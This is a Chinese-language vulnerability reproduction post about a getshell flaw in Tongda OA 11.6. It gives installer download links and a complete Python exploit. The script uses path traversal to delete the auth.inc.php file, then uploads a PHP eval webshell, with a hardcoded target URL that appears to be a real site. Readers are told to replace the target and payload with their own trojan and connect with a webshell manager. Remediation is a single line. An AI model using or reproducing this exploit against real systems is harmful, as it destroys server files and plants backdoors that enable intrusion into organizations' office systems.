最新通達OA11.6版本前台getshell漏洞復現
0x00漏洞簡介
通達OA(Office Anywhere網絡智能辦公系統)是由北京通達信科科技有限公司自主研發的協同辦公自動化系統,包括流程審批、行政辦公、日常事務、數據統計分析、即時通訊、移動辦公等。
該exp會刪除uth.inc.php文件可能回損害oa系統。
0X01漏洞影響版本
經測試,11.6版本受影響,11.3以及2017版本不受影響
0X02漏洞環境搭建
鏈接:https://pan.baidu.com/s/1VqUUNUsgsssK1Mhq2r8HHQ
提取碼:him4
安裝包為11.6版本
鏈接:https://pan.baidu.com/s/1P81Fw0m0_FOWYALjqNcRFw
提取碼:nw94
安裝包為11.3版本
鏈接:https://pan.baidu.com/s/164qP3pnbE6gQ29fkTXI52g
提取碼:ab4b
安裝包為2017版本
下載好后傻瓜式安裝即可
0X03漏洞復現
將exp中的target替換為目標url
Payload替換為自己的木馬即可
然后使用webshell管理工具即可
結果圖為:
第一個為11.6利用成功
第二個為11.3利用失敗
第三個為2017利用失敗
菜刀連接
0X04exp
Exp代碼為:
import requests target="http://oa.ldxyhq.com/" payload="<?php eval($_REQUEST['a']);?>" print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA") input("Press enter to continue") print("[*]Deleting auth.inc.php....") url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php" requests.get(url=url) print("[*]Checking if file deleted...") url=target+"/inc/auth.inc.php" page=requests.get(url=url).text if 'No input file specified.' not in page: print("[-]Failed to deleted auth.inc.php") exit(-1) print("[+]Successfully deleted auth.inc.php!") print("[*]Uploading payload...") url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./" files = {'FILE1': ('hack.php', payload)} requests.post(url=url,files=files) url=target+"/_hack.php" page=requests.get(url=url).text if 'No input file specified.' not in page: print("[+]Filed Uploaded Successfully") print("[+]URL:",url) else: print("[-]Failed to upload file")
0X05漏洞修復
升級官方最新版本